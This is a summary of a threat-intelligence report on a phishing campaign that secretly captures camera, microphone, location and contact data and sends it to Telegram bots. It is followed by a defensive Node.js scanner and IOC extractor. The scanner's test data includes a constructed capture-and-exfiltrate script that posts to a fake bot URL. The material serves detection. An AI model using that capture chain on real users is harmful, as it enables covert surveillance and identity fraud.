Cyble Research & Intelligence Labs has uncovered an active phishing campaign hosted on edgeone.app infrastructure that goes beyond credential theft. Using deceptive lures such as 'ID Scanner,' 'Telegram ID Freezing,' and 'Health Fund AI,' the campaign tricks users into granting browser-level camera, microphone, and contact permissions. Once those permissions are granted, embedded JavaScript silently captures photos, video, audio, device fingerprints, geolocation, and contact lists, then exfiltrates everything to attacker-controlled Telegram bots through the Telegram Bot API. The lure pages impersonate TikTok, Telegram, Instagram, Google Chrome/Drive, and Flappy Bird. Code analysis suggests AI-assisted development, based on the structured annotations and emoji-based formatting found in the malicious scripts. The harvested biometric and multimedia data could enable identity fraud, deepfake attacks, video-KYC bypass, extortion, and targeted social engineering. The full report provides MITRE ATT&CK techniques and IOCs.
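Added example (not Cyble's code, and not the campaign's script) of how a defender can triage scripts for the pattern described above: a Node.js scanner that flags JavaScript which combines the named browser collection APIs (getUserMedia, geolocation, the Contact Picker, canvas fingerprinting) with a hard-coded Telegram Bot API URL, and extracts the bot token and chat_id as IOCs. The API regexes, the verdict thresholds, the assumed bot-token shape and the two sample scripts are this example's own assumptions and constructions, not data taken from the report.

```javascript
// Added example (not Cyble's code and not the campaign's script): a static
// triage scanner for JavaScript that pairs sensitive browser APIs with
// Telegram Bot API exfiltration. The API patterns, verdict thresholds and the
// sample scripts below are this example's own assumptions/constructions.

// Browser APIs the summary names as the campaign's collection surface.
const SENSITIVE_APIS = {
  camera_mic:     /navigator\.mediaDevices\.getUserMedia\s*\(/,
  media_recorder: /new\s+MediaRecorder\s*\(/,
  geolocation:    /navigator\.geolocation\.(getCurrentPosition|watchPosition)\s*\(/,
  contacts:       /navigator\.contacts\.select\s*\(/,
  fingerprint:    /\.toDataURL\s*\(|navigator\.(hardwareConcurrency|deviceMemory|plugins)/,
};

// Bot API calls embed the bot token in the URL:
//   https://api.telegram.org/bot<id>:<secret>/<method>
// The token shape (numeric bot id, colon, 35 URL-safe chars) is an assumption
// drawn from the public token format, not from the report.
const TELEGRAM_BOT_URL = /https?:\/\/api\.telegram\.org\/bot(\d{8,10}:[A-Za-z0-9_-]{35})\/(send\w+|getUpdates)/g;
// chat_id passed as a JSON key, an assignment, or a FormData append.
const CHAT_ID = /chat_id["']?\s*[:=,]\s*["']?(-?\d{6,15})/g;

function scanScript(source) {
  const apis = Object.entries(SENSITIVE_APIS)
    .filter(([, re]) => re.test(source))
    .map(([name]) => name);

  const botTokens = new Set();
  const methods = new Set();
  for (const m of source.matchAll(TELEGRAM_BOT_URL)) {
    botTokens.add(m[1]);
    methods.add(m[2]);
  }
  const chatIds = new Set([...source.matchAll(CHAT_ID)].map((m) => m[1]));

  // A hard-coded bot token next to camera/mic/location collection is the strong
  // signal; either alone only earns a manual review, because video-chat pages
  // call getUserMedia legitimately.
  let verdict = 'clean';
  if (botTokens.size > 0 && apis.length > 0) verdict = 'high';
  else if (botTokens.size > 0 || apis.length > 0) verdict = 'review';

  return { verdict, apis, botTokens: [...botTokens], methods: [...methods], chatIds: [...chatIds] };
}

// Keep the bot id (enough to block or to report to Telegram) and drop the
// secret half so an IOC list does not redistribute a working credential.
function redactToken(token) {
  const [botId] = token.split(':');
  return `${botId}:<redacted>`;
}

function iocLines(result) {
  return [
    ...result.botTokens.map((t) => `api.telegram[.]org/bot${redactToken(t)}`),
    ...result.chatIds.map((id) => `telegram chat_id ${id}`),
  ];
}

// Constructed sample resembling the described pattern (emoji-annotated capture
// chain posting to a bot). The token and chat_id are fake.
const CONSTRUCTED_MALICIOUS = [
  '// 🎥 Step 1: ask for camera + mic',
  'const stream = await navigator.mediaDevices.getUserMedia({ video: true, audio: true });',
  '// 📍 Step 2: location and fingerprint',
  'navigator.geolocation.getCurrentPosition((p) => coords.push(p.coords));',
  'const fp = canvas.toDataURL("image/png");',
  '// 📤 Step 3: ship it to the bot',
  'const BOT = "https://api.telegram.org/bot1234567890:AAFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKE0/sendPhoto";',
  'form.append("chat_id", "987654321");',
  'fetch(BOT, { method: "POST", body: form });',
].join('\n');

// Constructed benign sample: a video-call page that uses the camera but keeps
// the stream local.
const CONSTRUCTED_BENIGN = [
  'const stream = await navigator.mediaDevices.getUserMedia({ video: true });',
  'document.querySelector("video").srcObject = stream;',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, src] of [['malicious', CONSTRUCTED_MALICIOUS], ['benign', CONSTRUCTED_BENIGN]]) {
    const r = scanScript(src);
    console.log(label, r.verdict, r.apis.join(','), iocLines(r));
  }
}
```

Run it with `node scan.js` against beautified sources; treat 'review' as a manual queue rather than a block decision, since any legitimate video or maps page trips one of the API patterns. The scanner is purely pattern-based, so a token assembled at runtime from split strings or a URL hidden behind an obfuscator must be deobfuscated first. The redaction deliberately keeps the numeric bot id, which is what a takedown request or blocklist needs, while never republishing the secret half.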

10 min read. From cyble.com
Table of contents
Executive Summary
Key Takeaways
Overview
Business Impact and Potential Abuse
Why does this matter?
Technical Analysis
Conclusion
Our Recommendations
MITRE ATT&CK® Techniques
Indicators of Compromise (IOCs)
